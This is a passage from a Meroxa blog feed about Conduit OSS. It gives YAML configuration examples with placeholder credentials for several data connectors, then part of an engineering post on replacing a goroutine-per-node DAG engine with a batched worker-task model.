  &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; standalone&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;salesforce
  &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;auth.client_id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&amp;lt;client_id&gt;&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;auth.client_secret&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&amp;lt;client_secret&gt;&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;auth.username&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&amp;lt;username&gt;&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;auth.password&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&amp;lt;password&gt;&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;api.version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;v52.0&quot;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Use Case:&lt;/strong&gt; Sync Salesforce opportunities to Snowflake for real-time sales insights.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;2. &lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-kinesis&quot;&gt;Amazon Kinesis Connector&lt;/a&gt;&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Integrate high-throughput streams to Kinesis for real-time analytics.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Configuration Example:&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;kinesis-destination&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; destination
  &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; standalone&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;kinesis
  &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;aws.region&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;us-east-1&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;aws.access_key_id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&amp;lt;access_key&gt;&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;aws.secret_access_key&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&amp;lt;secret_key&gt;&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;stream_name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;my-data-stream&quot;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Use Case:&lt;/strong&gt; Stream IoT data for real-time monitoring and alerts.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;3. &lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-sqs&quot;&gt;Amazon SQS Connector&lt;/a&gt;&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Simplify message handling with Amazon Simple Queue Service (SQS).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Configuration Example:&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;sqs-source&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
  &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; standalone&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;sqs
  &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;aws.region&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;us-west-2&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;aws.access_key_id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&amp;lt;access_key&gt;&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;aws.secret_access_key&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&amp;lt;secret_key&gt;&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;queue_url&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;https://sqs.us-west-2.amazonaws.com/123456789012/my-queue&quot;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Use Case:&lt;/strong&gt; Queue tasks for downstream services in a microservices architecture.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;4. &lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-elasticsearch&quot;&gt;Elasticsearch Connector (Source)&lt;/a&gt;&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Stream Elasticsearch index data into your pipelines for further analysis.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Configuration Example:&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;es-source&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
  &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; standalone&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;elasticsearch
  &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;elasticsearch.url&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;http://localhost:9200&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;elasticsearch.index&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;my-index&quot;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Use Case:&lt;/strong&gt; Extract logs for storage in a data lake or for further processing.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;5. &lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-dynamodb&quot;&gt;Amazon DynamoDB Connector (Source)&lt;/a&gt;&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Leverage DynamoDB Streams for real-time updates, inserts, and deletes.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Configuration Example:&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;source&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
  &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; standalone&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;dynamodb
  &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;aws.region&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;us-east-1&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;aws.access_key_id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&amp;lt;access_key&gt;&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;aws.secret_access_key&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&amp;lt;secret_key&gt;&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;table_name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;my-table&quot;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Use Case:&lt;/strong&gt; Replicate data from DynamoDB to a relational database for reporting.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Coming Soon: Expanded Capabilities&lt;/strong&gt;&lt;/h3&gt;
&lt;h3&gt;&lt;strong&gt;1. &lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-mysql&quot;&gt;MySQL Connector&lt;/a&gt;&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Stream real-time MySQL changes with Change Data Capture (CDC).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Planned Configuration Example:&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;source&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
  &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; standalone&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;mysql
  &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;mysql.host&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;localhost&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;mysql.user&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;root&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;mysql.password&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;password&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;mysql.database&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;mydb&quot;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Use Case:&lt;/strong&gt; Synchronize MySQL data with cloud data warehouses for real-time analysis.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;2. &lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-sftp&quot;&gt;SFTP Connector&lt;/a&gt;&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Automate file ingestion from SFTP servers into your pipelines.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Planned Configuration Example:&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;source&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
  &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; standalone&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;sftp
  &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;sftp.host&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;sftp.example.com&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;sftp.username&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;user&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;sftp.password&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;password&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;file_pattern&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;*.csv&quot;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Use Case:&lt;/strong&gt; Import nightly batch files for processing in data lakes or warehouses.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Why Developers Love Conduit OSS&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Developer-Centric Design&lt;/strong&gt;: Pre-built connectors save time and effort.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Ready&lt;/strong&gt;: Instantly access, stream, and process data.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalability&lt;/strong&gt;: Handles large data loads effortlessly.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Flexibility&lt;/strong&gt;: Easily configure sources and destinations for any workflow.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Free and Transparent&lt;/strong&gt;: As an open-source project, Conduit OSS is free to use, modify, and extend.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Get Started Today&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Explore these connectors and start building:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-salesforce&quot;&gt;Salesforce Connector&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-kinesis&quot;&gt;Amazon Kinesis Connector&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-sqs&quot;&gt;Amazon SQS Connector&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-elasticsearch&quot;&gt;Elasticsearch Connector&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-dynamodb&quot;&gt;Amazon DynamoDB Connector&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;Join the Community&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Collaborate with fellow developers and contribute to Conduit OSS on &lt;a href=&quot;https://github.com/conduitio/conduit&quot;&gt;GitHub&lt;/a&gt; or &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord&lt;/a&gt;. Share your feedback and ideas to help us expand the ecosystem with new connectors and features.&lt;/p&gt;
&lt;p&gt;Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, and &lt;a href=&quot;https://youtube.com/@meroxadata143&quot;&gt;YouTube&lt;/a&gt; for more insights and updates!&lt;/p&gt;
&lt;p&gt;Have managed platform needs? &lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;Request a demo&lt;/a&gt; with one of our expert team members today!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Optimizing Conduit - 5x the Throughput]]></title><description><![CDATA[In this blog, we dive into how Conduit transitioned from a flexible but slower architecture to a high-performance streaming engine. We explore the limitations of the old DAG-based design, its impact on ordering guarantees and backpressure, and why switching to a Worker-Task Model drastically improved throughput and efficiency. With real-world performance benchmarks showing a 5x increase in message throughput, this blog is a must-read for developers and data engineers looking to optimize their data pipelines. Learn how Conduit is setting a new standard for real-time data movement and how you can leverage these improvements today! 🚀]]></description><link>https://meroxa.com/blog/optimizing-conduit-5x-the-throughput</link><guid isPermaLink="false">https://meroxa.com/blog/optimizing-conduit-5x-the-throughput</guid><dc:creator><![CDATA[Lovro Mažgon]]></dc:creator><pubDate>Wed, 29 Jan 2025 12:53:00 GMT</pubDate><content:encoded>&lt;p&gt;Conduit has been a public tool for more than 3 years now. When we first started developing Conduit the goals were clear - make a simple-to-use data streaming tool that &quot;just works&quot;. Since we started from scratch, we were following the old advice of &quot;make it work, make it right, make it fast&quot;. We focused on getting the functionality right and picked an architecture that gave us the flexibility the project needed at the start, without focusing as much on performance.&lt;/p&gt;
&lt;p&gt;After years of developing Conduit and operating it on our platform, running thousands of pipelines, we were finally in a place where we could, without a doubt, tick off the first two. Conduit worked correctly as set out at the start and the code was structured in a way that allowed us to easily extend its functionality. Now we found the time to focus on the last part of the advice - &quot;make it fast&quot;.&lt;/p&gt;
&lt;p&gt;After benchmarking and profiling the code we quickly identified the bottlenecks in Conduit&apos;s internal streaming engine. We realized that a new architecture would not only have a great impact on the throughput but also simplify the code. Win-win!&lt;/p&gt;
&lt;h2&gt;The Old Architecture: Strengths and Limitations&lt;/h2&gt;
&lt;p&gt;Let&apos;s first give you an overview of the old architecture, why we chose it in the first place and what were its limitations.&lt;/p&gt;
&lt;h3&gt;Directed Acyclic Graph (DAG)&lt;/h3&gt;
&lt;p&gt;A data pipeline is in essence a directed acyclic graph (DAG), where data is moving from one or multiple sources through one or multiple processors that process the data towards one or multiple destinations. Now, if we draw such a DAG, we can easily see that each node in the graph receives data from a previous node and passes it on to the next node. Conceptually, this perfectly fits the classic way Go encourages developers to write concurrent code, where each goroutine communicates with other nodes using a shared channel.&lt;/p&gt;
&lt;p&gt;Here’s what a DAG could look like in a typical pipeline.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/dag-1.png&quot; alt=&quot;dag-1.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;So this is exactly what we modeled in our code. Every node in the DAG was a separate goroutine that was responsible for doing one specific task. The goroutines passed data to each other using unbuffered channels. This software architecture is close to the mental model developers generally use when thinking about a data pipeline. Since we just started working on the project and didn&apos;t have a clear idea of all the features we wanted to implement in a Conduit pipeline, this seemed like a straightforward choice. It gave us the flexibility of creating different pipelines by connecting nodes together any way we pleased. In the end, we settled on the Conduit pipeline structure we all know and love today - one or multiple sources at the start, one or multiple destinations at the end, and processors that act on the whole pipeline or on a single source or destination.&lt;/p&gt;
&lt;h3&gt;The Good&lt;/h3&gt;
&lt;p&gt;This architecture made it very easy to implement two very valuable guarantees - the ordering guarantee and backpressure. Go channels already guarantee that data written to a channel by one goroutine will be received on the other end in the same order. Since we only ever had a single goroutine writing to a channel and a single goroutine reading from it, the data always flowed through the pipeline and reached the destination in the same order as it was produced by the source.&lt;/p&gt;
&lt;p&gt;We also decided to use unbuffered channels. An unbuffered channel can only be written to if there is another goroutine reading from that channel, otherwise the writer is blocked. This essentially means that any node in the DAG can only send data to the next node if the next one is ready to receive the data. This resulted in backpressure being applied over the whole pipeline. The speed of the slowest destination thus dictated the speed of the whole pipeline, since sources would be blocked trying to send data to the next node if the last node (destination) was busy writing a record.&lt;/p&gt;
&lt;p&gt;The fact that we used nodes also allowed us to easily implement things like parallel processors and the stream inspector. The basic building blocks did not have to change, instead, we simply adjusted the topology of the pipeline by adding additional nodes or connecting them in a different way.&lt;/p&gt;
&lt;h3&gt;The Bad&lt;/h3&gt;
&lt;p&gt;However, there were limitations to the architecture. First, to keep things simple, we made it a rule that nodes only ever operate on a single record. This allowed us to reason about our code and made it easy to make sure all records were accounted for and flushed when a pipeline was stopped. However, this also meant that batching records was off the table. This was the single biggest bottleneck of the old architecture, since processing records and sending them through channels one by one resulted in lots of handovers between goroutines. When profiling the code we noticed that the nodes spent most of the time writing or reading from a channel. Reducing this overhead was a huge opportunity for optimization.&lt;/p&gt;
&lt;p&gt;We realized that managing a huge number of goroutines can get out of hand quickly. Edge cases that can happen in a highly concurrent environment can be non-intuitive for humans to figure out and even harder to test and reproduce consistently. Even though each node was a relatively simple building block by itself, the complexity of orchestrating them was that much higher, especially when a node unexpectedly stopped and things had to be cleaned up.&lt;/p&gt;
&lt;h3&gt;The Ugly&lt;/h3&gt;
&lt;p&gt;Debugging a pipeline that&apos;s composed of dozens of goroutines can suddenly become a day-long task. If you are so lucky that you can reproduce the issue, you still have to find the goroutine causing it. Well, &lt;em&gt;if&lt;/em&gt; the cause is a single goroutine, that is. Odds are that the issue is caused by multiple goroutines interacting in a certain way.&lt;/p&gt;
&lt;p&gt;And then there are the two worst things that can happen in a concurrent environment, panics and blocks. A panicking goroutine will bring down the whole application, so recovering and converting panics to an error is crucial. This is easily done if you are in charge of spawning the goroutines, but you need to be consistent or use a library like &lt;a href=&quot;https://github.com/sourcegraph/conc&quot;&gt;conc&lt;/a&gt; to do it for you. Blocking goroutines are harder to prevent. If a bug in the code causes a goroutine to block forever, you can&apos;t force it to stop from another goroutine. And the more goroutines you have, the higher the chances of ending up with an uncaught panic or a blocked goroutine.&lt;/p&gt;
&lt;h2&gt;The New Architecture: Simplicity and Performance&lt;/h2&gt;
&lt;p&gt;We utilized the lessons we learned from implementing the old architecture, benchmarks and profiles, and decided to implement a new streaming engine, designed with simplicity, performance, and maintenance in mind.&lt;/p&gt;
&lt;h3&gt;The Worker-Task Model&lt;/h3&gt;
&lt;p&gt;While the Go community often emphasizes the power of goroutines and channels for concurrent programming, our experience showed that overusing these abstractions introduced overhead that became a bottleneck. Although the node architecture offered flexibility, it didn&apos;t meet our performance needs because the pipeline still operated sequentially, which meant that we didn&apos;t benefit from parallel processing. Each record had to go through multiple nodes, adding latency and reducing throughput due to the overhead of managing these intermediate steps.&lt;/p&gt;
&lt;p&gt;We decided to remove the unnecessary concurrency and embrace a single-threaded approach. This way we gained significant performance improvements while making the code easier to understand and debug. The result is a leaner, faster, and more maintainable engine that retains all the reliability guarantees our users expect from Conduit.&lt;/p&gt;
&lt;p&gt;The new architecture operates with a single-threaded worker per source. Each worker executes a sequence of &lt;strong&gt;tasks&lt;/strong&gt;, representing the stages of the pipeline:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Source tasks&lt;/strong&gt;: Collect a batch of records from the source connector.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Processor tasks&lt;/strong&gt;: Transform, filter, or enrich the batch of records.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Destination tasks&lt;/strong&gt;: Send the processed batch to the destination connector.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Unlike the previous DAG-based approach, where records are moved between nodes via channels, the new model processes batches end-to-end within the same worker. This eliminates the overhead of inter-goroutine communication and reduces context switching.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/worker-task.png&quot; alt=&quot;worker-task.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Besides cutting down on goroutines we also introduced the ability to process batches of records, which dramatically decreased the time spent on guiding records through the pipeline, since those operations were now executed only once per batch and not once per record. Note that what we call &quot;batch&quot; in Conduit could be considered a &quot;micro-batch&quot;, since the size is very small and it&apos;s flushed every few seconds. The purpose is simply to reduce the number of operations per record and the number of round-trips to external systems. Users are in charge of defining the maximum batch size and the delay after which a batch is flushed, so the old behavior of streaming every record separately is still achievable and sometimes even preferable (e.g. to reduce latency in a pipeline that doesn&apos;t expect a high load in the first place).&lt;/p&gt;
&lt;h3&gt;Backward Compatibility and Guarantees&lt;/h3&gt;
&lt;p&gt;An important goal of the new architecture was to keep the new engine backward compatible and retain the same guarantees that we provided in the old architecture, specifically the ordering guarantee and backpressure.&lt;/p&gt;
&lt;p&gt;Given that records from a specific source need to reach the destination in the same order as they are produced on the source, we decided to use a single worker per source to not fall into the trap of having to orchestrate the order across multiple workers. This made it trivial to implement backpressure since a worker is only ever processing one batch at a time, so the source is not able to produce another batch until the last one is processed end-to-end.&lt;/p&gt;
&lt;p&gt;However, because we introduced batching, the ordering guarantee was a tougher nut to crack. You have to consider acknowledgments to understand why this was not simple:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Ordered acknowledgments&lt;/strong&gt;: Records must reach the destination in the same order as produced by the source. At the same time, acknowledgments must propagate back to the source in order.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Acknowledgments are done per record&lt;/strong&gt;: Conduit sends acknowledgments back to the source connector for specific records, not for whole batches, as batches can be partially processed.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Records need to be end-to-end processed&lt;/strong&gt;: Only records that reach the end of the pipeline can be successfully acknowledged. &quot;The end of the pipeline&quot; could be the dead-letter-queue (DLQ) or a destination.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To illustrate these challenges, let&apos;s dive deeper with an example.&lt;/p&gt;
&lt;p&gt;Consider a pipeline with 1 source, 1 processor and 1 destination. The records produced by the source are supposed to contain URLs, which the processor uses to fetch more data and enrich the records.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/example1.png&quot; alt=&quot;example1.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Let&apos;s say the source produces a batch of 5 records and the worker supplies them to the processor. The processor processes all records successfully, except the 3rd record, which contains a malformed URL. Now, what should the worker do in this case to correctly honor the ordering guarantee?&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/example2.png&quot; alt=&quot;example2.png&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Write to DLQ first&lt;/h3&gt;
&lt;p&gt;One idea would be to send the 3rd record to the DLQ right away, remove it from the batch, and send the remaining 4 to the destination. However, if the 3rd record is successfully written to the DLQ while the rest fails to be written to the actual destination, the ordering guarantee is violated.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/example3.png&quot; alt=&quot;example3.png&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Write to the destination first&lt;/h3&gt;
